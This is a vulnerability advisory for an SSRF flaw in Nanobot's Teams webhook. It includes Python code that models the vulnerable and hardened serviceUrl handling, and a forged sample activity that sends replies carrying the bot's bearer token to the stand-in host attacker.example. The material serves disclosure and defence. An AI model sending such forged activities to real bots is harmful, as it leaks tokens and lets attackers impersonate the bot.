CVE-2026-49139
Server-Side Request Forgery in Nanobot Prior to 0.2.1
Publication date: 2026-06-01
Last updated on: 2026-06-01
Assigner: VulnCheck
Description
Exploitability
| CWE ID | Description |
|---|---|
| CWE-918 | The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. |
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability exists in Nanobot versions prior to 0.2.1 and involves a server-side request forgery (SSRF) issue in the Microsoft Teams channel handler.
Remote attackers can exploit this by sending a forged activity containing an attacker-controlled serviceUrl value to the Teams webhook.
Because the handler stores that serviceUrl in the conversation reference without checking it, subsequent replies for that conversation are POSTed to the attacker-controlled host, and each reply carries the bot's Bot Framework bearer token in its Authorization header.
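The following is an added illustration, not nanobot's own code and not the 0.2.1 patch. It models the flaw described above (a conversation reference updated straight from the incoming activity body) next to a hardened variant that only accepts an https serviceUrl on a known Bot Framework host and that matches the serviceurl claim of the already-validated Bot Connector JWT. The trusted-host list, the activity dictionaries, the claim dictionary and the helper names are assumptions made for the example; the JWT signature, issuer and audience checks are assumed to have happened before these functions are called.

```python
from urllib.parse import urlparse

# Assumption: hosts the Teams / Bot Framework channel legitimately replies to.
TRUSTED_EXACT_HOSTS = {"smba.trafficmanager.net"}
TRUSTED_HOST_SUFFIXES = (".botframework.com",)


def is_trusted_service_url(url) -> bool:
    """True only for an https URL whose host is a known Bot Framework host."""
    if not isinstance(url, str):
        return False
    try:
        parts = urlparse(url)
    except ValueError:
        return False
    if parts.scheme != "https" or not parts.hostname:
        return False
    if parts.username is not None or parts.password is not None:
        # "https://smba.trafficmanager.net@attacker.example/" must not pass.
        return False
    host = parts.hostname.lower()
    return host in TRUSTED_EXACT_HOSTS or host.endswith(TRUSTED_HOST_SUFFIXES)


def _normalize(url: str) -> str:
    # Bot Framework compares serviceUrl values ignoring a trailing slash.
    return url.rstrip("/").lower()


def store_reference_vulnerable(store: dict, activity: dict) -> None:
    """Pre-fix behaviour as the advisory describes it: trust the body as-is."""
    store[activity["conversation"]["id"]] = {"serviceUrl": activity["serviceUrl"]}


def store_reference_hardened(store: dict, activity: dict, token_claims: dict) -> None:
    """Store the reference only if serviceUrl is a trusted host and equals the
    'serviceurl' claim of the validated Bot Connector JWT (assumed validated)."""
    service_url = activity.get("serviceUrl")
    if not is_trusted_service_url(service_url):
        raise ValueError(f"untrusted serviceUrl rejected: {service_url!r}")
    claimed = token_claims.get("serviceurl")
    if claimed is None or _normalize(claimed) != _normalize(service_url):
        raise ValueError("serviceUrl does not match the token's serviceurl claim")
    store[activity["conversation"]["id"]] = {"serviceUrl": service_url}


def build_reply_request(store: dict, conversation_id: str, bearer_token: str) -> dict:
    """Where the token ends up: replies are POSTed to the stored serviceUrl."""
    service_url = store[conversation_id]["serviceUrl"].rstrip("/")
    return {
        "url": f"{service_url}/v3/conversations/{conversation_id}/activities",
        "headers": {"Authorization": f"Bearer {bearer_token}"},
    }


# Constructed sample activities and claims (not captured traffic).
CONV_ID = "19:abc@thread.tacv2"
LEGIT_ACTIVITY = {
    "type": "message",
    "serviceUrl": "https://smba.trafficmanager.net/amer/",
    "conversation": {"id": CONV_ID},
    "text": "hello",
}
LEGIT_CLAIMS = {"serviceurl": "https://smba.trafficmanager.net/amer/"}
FORGED_ACTIVITY = {
    "type": "message",
    "serviceUrl": "https://attacker.example/collect/",
    "conversation": {"id": CONV_ID},
    "text": "hello",
}


def demo():
    """Returns (poisoned reply URL, whether the hardened path rejected the forgery,
    reply URL kept by the hardened path)."""
    vulnerable_store, hardened_store = {}, {}
    store_reference_vulnerable(vulnerable_store, LEGIT_ACTIVITY)
    store_reference_vulnerable(vulnerable_store, FORGED_ACTIVITY)  # reference poisoned
    poisoned_target = build_reply_request(vulnerable_store, CONV_ID, "TOKEN")["url"]

    store_reference_hardened(hardened_store, LEGIT_ACTIVITY, LEGIT_CLAIMS)
    try:
        store_reference_hardened(hardened_store, FORGED_ACTIVITY, LEGIT_CLAIMS)
        rejected = False
    except ValueError:
        rejected = True
    safe_target = build_reply_request(hardened_store, CONV_ID, "TOKEN")["url"]
    return poisoned_target, rejected, safe_target


if __name__ == "__main__":
    print(demo())
```

The host check alone is not enough: an attacker who can reach the webhook can still supply a different trusted-looking host or region path, so the claim comparison is what ties the serviceUrl to the token the connector actually issued. The userinfo guard matters because a naive substring match on the hostname would accept a URL whose authority is really attacker.example.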
How can this vulnerability impact me?
The vulnerability can lead to unauthorized exfiltration of Bot Framework bearer tokens.
Attackers gaining these tokens could impersonate the bot or access sensitive communications, potentially leading to further attacks or data breaches.